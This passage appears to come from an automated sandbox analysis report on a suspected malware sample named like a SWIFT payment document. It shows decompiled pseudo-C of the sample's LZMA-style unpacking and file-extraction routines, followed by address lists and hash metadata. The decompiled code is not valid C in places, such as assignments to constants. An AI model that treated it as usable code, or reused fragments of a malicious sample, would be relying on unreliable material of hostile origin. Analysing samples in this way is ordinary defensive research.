							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}

0x00406bc0
0x00406bc7
0x00406bcd
0x00406bd3
0x00000000
0x00406bd7
0x00406be3
0x00406be3
0x00406be3
0x00406bec
0x00000000
0x00000000
0x00406bf2
0x00000000
0x00406bf9
0x00406bfd
0x00000000
0x00000000
0x00406c06
0x00406c09
0x00406c0c
0x00406c0e
0x00406c10
0x00000000
0x00000000
0x00406c16
0x00406c19
0x00406c1b
0x00406c1c
0x00406c1f
0x00406c21
0x00406c22
0x00406c24
0x00406c27
0x00406c2c
0x00406c31
0x00406c3a
0x00406c4d
0x00406c50
0x00406c59
0x00406c5c
0x00406c84
0x00406c84
0x00406c86
0x00406c94
0x00406c94
0x00406c98
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c88
0x00406c88
0x00406c8b
0x00406c8b
0x00406c8c
0x00406c8c
0x00000000
0x00406c88
0x00406c5e
0x00406c62
0x00406c67
0x00406c67
0x00406c70
0x00406c76
0x00406c78
0x00406c7b
0x00000000
0x00406c81
0x00406c81
0x00000000
0x00406c81
0x00000000
0x00406c9e
0x00406c9e
0x00406ca2
0x0040754e
0x00000000
0x0040754e
0x00406cab
0x00406cbb
0x00406cbe
0x00406cc1
0x00406cc1
0x00406cc1
0x00406cc4
0x00406cc4
0x00406cc8
0x00000000
0x00000000
0x00406cca
0x00406ccd
0x00406cd0
0x00406cfa
0x00406d00
0x00406d07
0x00000000
0x00406d07
0x00406cd2
0x00406cd6
0x00406cd9
0x00406cde
0x00406cde
0x00406ce9
0x00406cef
0x00406cf1
0x00406cf4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d39
0x00406d3f
0x00406d42
0x00406d4f
0x00406d57
0x00000000
0x00000000
0x00406d0e
0x00406d0e
0x00406d12
0x0040755d
0x00000000
0x0040755d
0x00406d1e
0x00406d29
0x00406d29
0x00406d29
0x00406d2c
0x00406d2f
0x00406d32
0x00406d35
0x00406d37
0x00000000
0x00000000
0x00000000
0x00000000
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073dd
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x00407413
0x0040741a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040741c
0x0040741c
0x00407420
0x004075cf
0x00000000
0x004075cf
0x0040742c
0x00407433
0x0040743b
0x0040743b
0x0040743b
0x0040743e
0x00407441
0x00407441
0x00000000
0x00000000
0x00406d5f
0x00406d61
0x00406d64
0x00406dd5
0x00406dd8
0x00406ddb
0x00406de2
0x00406dec
0x00000000
0x00406dec
0x00406d66
0x00406d6a
0x00406d6d
0x00406d6f
0x00406d72
0x00406d75
0x00406d77
0x00406d7a
0x00406d7c
0x00406d81
0x00406d84
0x00406d87
0x00406d8b
0x00406d92
0x00406d95
0x00406d9c
0x00406da0
0x00406da8
0x00406da8
0x00406da8
0x00406da2
0x00406da2
0x00406da2
0x00406d97
0x00406d97
0x00406d97
0x00406dac
0x00406daf
0x00406dcd
0x00406dcf
0x00000000
0x00406dcf
0x00406db1
0x00406db4
0x00406db7
0x00406dba
0x00406dbc
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc2
0x00406dc4
0x00406dc5
0x00406dc8
0x00000000
0x00000000
0x00406ffe
0x00407002
0x00407020
0x00407023
0x0040702a
0x0040702d
0x00407030
0x00407033
0x00407036
0x00407039
0x0040703b
0x00407042
0x00407043
0x00407045
0x00407048
0x0040704b
0x0040704e
0x0040704e
0x00407053
0x00000000
0x00407053
0x00407004
0x00407007
0x0040700a
0x00407014
0x00000000
0x00000000
0x00407068
0x0040706c
0x0040708f
0x00407092
0x00407095
0x0040709f
0x0040706e
0x0040706e
0x00407071
0x00407074
0x00407077
0x00407084
0x00407087
0x00407087
0x00000000
0x00000000
0x004070ab
0x004070af
0x00000000
0x00000000
0x004070b5
0x004070b9
0x00000000
0x00000000
0x004070bf
0x004070c1
0x004070c5
0x004070c5
0x004070c8
0x004070cc
0x00000000
0x00000000
0x0040711c
0x00407120
0x00407127
0x0040712a
0x0040712d
0x00407137
0x00000000
0x00407137
0x00407122
0x00000000
0x00000000
0x00407143
0x00407147
0x0040714e
0x00407151
0x00407154
0x00407149
0x00407149
0x00407149
0x00407157
0x0040715a
0x0040715d
0x0040715d
0x00407160
0x00407163
0x00407166
0x00407166
0x00407169
0x00407170
0x00407175
0x00000000
0x00000000
0x00407203
0x00407203
0x00407207
0x004075a5
0x00000000
0x004075a5
0x0040720d
0x00407210
0x00407213
0x00407217
0x0040721a
0x00407220
0x00407222
0x00407222
0x00407222
0x00407225
0x00407228
0x00000000
0x00000000
0x00406df8
0x00406df8
0x00406dfc
0x00407569
0x00000000
0x00407569
0x00406e02
0x00406e05
0x00406e08
0x00406e0c
0x00406e0f
0x00406e15
0x00406e17
0x00406e17
0x00406e17
0x00406e1a
0x00406e1d
0x00406e1d
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406e29
0x00406e2f
0x00000000
0x00000000
0x00406e35
0x00406e35
0x00406e39
0x00406e3c
0x00406e3f
0x00406e42
0x00406e45
0x00406e46
0x00406e49
0x00406e4b
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e60
0x00406e63
0x00406e7f
0x00406e82
0x00406e85
0x00406e88
0x00406e8f
0x00406e93
0x00406e95
0x00406e99
0x00406e65
0x00406e65
0x00406e69
0x00406e71
0x00406e76
0x00406e78
0x00406e7a
0x00406e7a
0x00406e9c
0x00406ea3
0x00406ea6
0x00000000
0x00406eac
0x00000000
0x00406eac
0x00000000
0x00406eb1
0x00406eb1
0x00406eb5
0x00407575
0x00000000
0x00407575
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec5
0x00406ec8
0x00406ece
0x00406ed0
0x00406ed0
0x00406ed0
0x00406ed3
0x00406ed6
0x00406ed6
0x00406ed6
0x00406edc
0x00000000
0x00000000
0x00406ede
0x00406ee1
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406ef0
0x00406ef3
0x00406ef6
0x00406ef9
0x00406efc
0x00406f14
0x00406f17
0x00406f1a
0x00406f1d
0x00406f1d
0x00406f20
0x00406f24
0x00406f26
0x00406efe
0x00406efe
0x00406f06
0x00406f0b
0x00406f0d
0x00406f0f
0x00406f0f
0x00406f29
0x00406f30
0x00406f33
0x00000000
0x00406f35
0x00000000
0x00406f35
0x00406f33
0x00406f3a
0x00406f3a
0x00406f3a
0x00406f3a
0x00000000
0x00000000
0x00406f75
0x00406f75
0x00406f79
0x00407581
0x00000000
0x00407581
0x00406f7f
0x00406f82
0x00406f85
0x00406f89
0x00406f8c
0x00406f92
0x00406f94
0x00406f94
0x00406f94
0x00406f97
0x00406f9a
0x00406f9a
0x00406fa0
0x00406f3e
0x00406f3e
0x00406f41
0x00000000
0x00406f41
0x00406fa2
0x00406fa2
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb7
0x00406fba
0x00406fbd
0x00406fc0
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe1
0x00406fe1
0x00406fe4
0x00406fe8
0x00406fea
0x00406fc2
0x00406fc2
0x00406fca
0x00406fcf
0x00406fd1
0x00406fd3
0x00406fd3
0x00406fed
0x00406ff4
0x00406ff7
0x00000000
0x00406ff9
0x00000000
0x00406ff9
0x00000000
0x00407286
0x00407286
0x0040728a
0x004075b1
0x00000000
0x004075b1
0x00407290
0x00407293
0x00407296
0x0040729a
0x0040729d
0x004072a3
0x004072a5
0x004072a5
0x004072a5
0x004072a8
0x00000000
0x00000000
0x00407056
0x00407056
0x00407059
0x00000000
0x00000000
0x00407395
0x00407399
0x004073bb
0x004073be
0x004073c8
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x0040739b
0x0040739e
0x004073a2
0x004073a5
0x004073a5
0x004073a8
0x00000000
0x00000000
0x00407452
0x00407456
0x00407474
0x00407474
0x00407474
0x0040747b
0x00407482
0x00407489
0x00407489
0x00000000
0x00407489
0x00407458
0x0040745b
0x0040745e
0x00407461
0x00407468
0x004073ac
0x004073ac
0x004073af
0x00000000
0x00000000
0x00407543
0x00407546
0x00000000
0x00000000
0x0040717d
0x0040717f
0x00407186
0x00407187
0x00407189
0x0040718c
0x00000000
0x00000000
0x00407194
0x00407197
0x0040719a
0x0040719c
0x0040719e
0x0040719e
0x0040719f
0x004071a2
0x004071a9
0x004071ac
0x004071ba
0x00000000
0x00000000
0x00407490
0x00407490
0x00407493
0x0040749a
0x00000000
0x00000000
0x0040749f
0x0040749f
0x004074a3
0x004075db
0x00000000
0x004075db
0x004074a9
0x004074ac
0x004074af
0x004074b3
0x004074b6
0x004074bc
0x004074be
0x004074be
0x004074be
0x004074c1
0x004074c4
0x004074c4
0x004074c4
0x004074c4
0x004074c7
0x004074c7
0x004074cb
0x0040752b
0x0040752e
0x00407533
0x00407534
0x00407536
0x00407538
0x0040753b
0x00407447
0x00407447
0x00000000
0x00407447
0x004074cd
0x004074d3
0x004074d6
0x004074d9
0x004074dc
0x004074df
0x004074e2
0x004074e5
0x004074e8
0x004074eb
0x004074ee
0x00407507
0x0040750a
0x0040750d
0x00407510
0x00407514
0x00407516
0x00407516
0x00407517
0x0040751a
0x004074f0
0x004074f0
0x004074f8
0x004074fd
0x004074ff
0x00407502
0x00407502
0x0040751d
0x00407524
0x00000000
0x00407526
0x00000000
0x00407526
0x00000000
0x004071c2
0x004071c5
0x004071fb
0x0040732b
0x0040732b
0x0040732b
0x0040732b
0x0040732e
0x0040732e
0x00407331
0x00407333
0x004075bd
0x00000000
0x004075bd
0x00407339
0x0040733c
0x00000000
0x00000000
0x00407342
0x00407346
0x00407349
0x00407349
0x00407349
0x00000000
0x00407349
0x004071c7
0x004071c9
0x004071cb
0x004071cd
0x004071d0
0x004071d1
0x004071d3
0x004071d5
0x004071d8
0x004071db
0x004071f1
0x004071f6
0x0040722e
0x0040722e
0x00407232
0x0040725e
0x00407260
0x00407267
0x0040726a
0x0040726d
0x0040726d
0x00407272
0x00407272
0x00407274
0x00407277
0x0040727e
0x00407281
0x004072ae
0x004072ae
0x004072b1
0x004072b4
0x00407328
0x00407328
0x00407328
0x00000000
0x00407328
0x004072b6
0x004072bc
0x004072bf
0x004072c2
0x004072c5
0x004072c8
0x004072cb
0x004072ce
0x004072d1
0x004072d4
0x004072d7
0x004072f0
0x004072f2
0x004072f5
0x004072f6
0x004072f9
0x004072fb
0x004072fe
0x00407300
0x00407302
0x00407305
0x00407307
0x0040730a
0x0040730e
0x00407310
0x00407310
0x00407311
0x00407314
0x00407317
0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00406f44
0x00406f44
0x00406f48
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00000000
0x00000000
0x004070cf
0x004070cf
0x004070d3
0x00407599
0x00000000
0x00407599
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e4
0x004070e4
0x004070e4
0x004070e7
0x004070ea
0x004070ed
0x004070f0
0x004070f3
0x004070f6
0x004070f7
0x004070f9
0x004070f9
0x004070f9
0x004070fc
0x004070ff
0x00407102
0x00407105
0x00407105
0x00407105
0x00407108
0x0040710a
0x0040710a
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x0040710d
0x0040710d
0x00000000
0x0040710d
0x0040738e
0x004075c3
0x004075e5
0x004075eb
0x004075ed
0x004075f4
0x00000000
0x00000000
0x00406bf2
0x004075fa
0x004075fa
0x00000000

Strings

ebruary, xrefs: 00406BB0

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID:
String ID: ebruary
API String ID: 0-2749923991
Opcode ID: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
Instruction ID: 41bbaa2e3590000dceee7c9791d291245bc26db239967492cd44d063337b5de0
Opcode Fuzzy Hash: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
Instruction Fuzzy Hash: 3E814831D08228DBEF28CFA8C8447ADBBB1FF44305F14816AD856B7281D778A986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00403479 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E00403479(intOrPtr _a4) {
				intOrPtr _t11;
				signed int _t12;
				void* _t14;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t31;
				intOrPtr _t34;
				intOrPtr _t36;
				void* _t37;
				intOrPtr _t49;

				_t34 =  *0x420ef4 -  *0x40ce60 + _a4;
				 *0x42a26c = GetTickCount() + 0x1f4;
				if(_t34 <= 0) {
					L22:
					E0040302E(1);
					return 0;
				}
				E004035F8( *0x420f04);
				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
				 *0x420f00 = _t34;
				 *0x420ef0 = 0;
				while(1) {
					_t31 = 0x4000;
					_t11 =  *0x420ef8 -  *0x420f04;
					if(_t11 <= 0x4000) {
						_t31 = _t11;
					}
					_t12 = E004035E2(0x414ef0, _t31);
					if(_t12 == 0) {
						break;
					}
					 *0x420f04 =  *0x420f04 + _t31;
					 *0x40ce80 = 0x414ef0;
					 *0x40ce84 = _t31;
					L6:
					L6:
					if( *0x42a270 != 0 &&  *0x42a300 == 0) {
						 *0x420ef0 =  *0x420f00 -  *0x420ef4 - _a4 +  *0x40ce60;
						E0040302E(0);
					}
					 *0x40ce88 = 0x40cef0;
					 *0x40ce8c = 0x8000; // executed
					_t14 = E00406BB0(0x40ce68); // executed
					if(_t14 < 0) {
						goto L20;
					}
					_t36 =  *0x40ce88; // 0x40fe4f
					_t37 = _t36 - 0x40cef0;
					if(_t37 == 0) {
						__eflags =  *0x40ce84; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t31;
						if(_t31 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x420ef4;
						if(_t16 -  *0x40ce60 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
						goto L22;
					}
					_t18 = E0040620A( *0x40a01c, 0x40cef0, _t37); // executed
